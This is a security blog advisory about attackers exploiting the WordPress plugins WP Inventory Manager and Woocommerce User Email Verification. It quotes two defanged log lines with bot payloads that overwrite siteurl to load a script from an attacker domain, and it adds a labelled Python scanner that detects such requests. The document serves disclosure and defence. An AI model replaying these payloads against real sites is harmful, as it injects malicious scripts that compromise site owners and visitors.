
Sucuri Blog

Website Security News


Plugins Added to Malicious Campaign

April 25, 2019 | John Castro


We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to their target list in order to inject similar malicious scripts.

Plugins Added to the Attack

  • Download WP Inventory Manager (version <= 1.8.2)
  • Woocommerce User Email Verification (version <= 3.3.0, **Still Not Fixed**)

Attackers are trying to exploit vulnerable versions of these plugins. Public exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.

Payloads Used by Bots

  • Download WP Inventory Manager
    51.15.147.147 - action=save&siteurl=hxxps%3A%2F%2Fcdn.deliverymoretimes[.]info%2Fcdn.js%3Fty%3D1%26 [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php?page=wpim_manage_settings HTTP/1.1" 200 5 "-" "-"
  • Woocommerce User Email Verification
    51.15.147.147 - wuev_form_type=siteurl&hxxps://cdn.deliverymoretimes[.]info/simpletype.js?ty=1& [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 200 5 "-" "-"

Malicious Domains Injected So Far

hxxps://cdn[.]deliverymoretimes[.]info/simpletype[.]js?ty=1
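
As an added example (not Sucuri's code), this Python check scans logs in the layout of the two lines quoted above for POSTs to admin-post.php whose body names siteurl and carries a URL on another host. The layout regex, the name find_option_tampering, the site host shop.example and the sample lines (documentation IPs, .example hosts) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Layout assumed from the two log lines quoted in the post:
# <ip> - <POST body> [<time>] "<METHOD> <path> HTTP/x.y" <status> ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<body>.*?) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Also accept hxxp(s), since the post quotes its lines defanged.
URL_RE = re.compile(r'(?:https?|hxxps?)://([^/\s&?#]+)', re.I)


def find_option_tampering(lines, own_host):
    """Flag POSTs to admin-post.php whose body names siteurl and
    carries a URL on a host other than own_host."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m['method'] != 'POST':
            continue
        if not m['path'].split('?')[0].endswith('/wp-admin/admin-post.php'):
            continue
        body = unquote(m['body'])  # the first payload is URL-encoded
        if 'siteurl' not in body.lower():
            continue
        hosts = {h.lower().replace('[.]', '.') for h in URL_RE.findall(body)}
        foreign = sorted(hosts - {own_host.lower()})
        if foreign:
            hits.append({'ip': m['ip'], 'time': m['ts'],
                         'path': m['path'], 'hosts': foreign})
    return hits


# Constructed sample lines (documentation IPs, .example hosts).
TAIL = ' HTTP/1.1" 200 5 "-" "-"'
SAMPLE_LOG = [
    '203.0.113.10 - action=save&siteurl=https%3A%2F%2Fcdn.bad-host.example'
    '%2Fcdn.js%3Fty%3D1%26 [25/Apr/2019:05:14:28 +0000] '
    '"POST /wp-admin/admin-post.php?page=wpim_manage_settings' + TAIL,
    '203.0.113.10 - wuev_form_type=siteurl&https://cdn.bad-host.example/'
    'simpletype.js?ty=1& [25/Apr/2019:05:14:29 +0000] '
    '"POST /wp-admin/admin-post.php' + TAIL,
    '198.51.100.7 - action=contact&name=Ann [25/Apr/2019:06:00:00 +0000] '
    '"POST /wp-admin/admin-post.php' + TAIL,
    '198.51.100.8 - - [25/Apr/2019:06:01:00 +0000] '
    '"GET /wp-admin/admin-post.php' + TAIL,
]

if __name__ == '__main__':
    for hit in find_option_tampering(SAMPLE_LOG, 'shop.example'):
        print(hit)
```

Standard web server access logs do not record POST bodies, so this applies only where a WAF or audit log produces lines that include them.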

As always, we recommend adding a WAF as a second layer of protection. If you are using the plugin Woocommerce User Email Verification, it should be removed since the developer hasn’t fixed the “arbitrary options update” vulnerability.


Categories: WordPress Security
Tags: Balada Injector, WordPress Plugins and Themes

About John Castro

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPress plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn
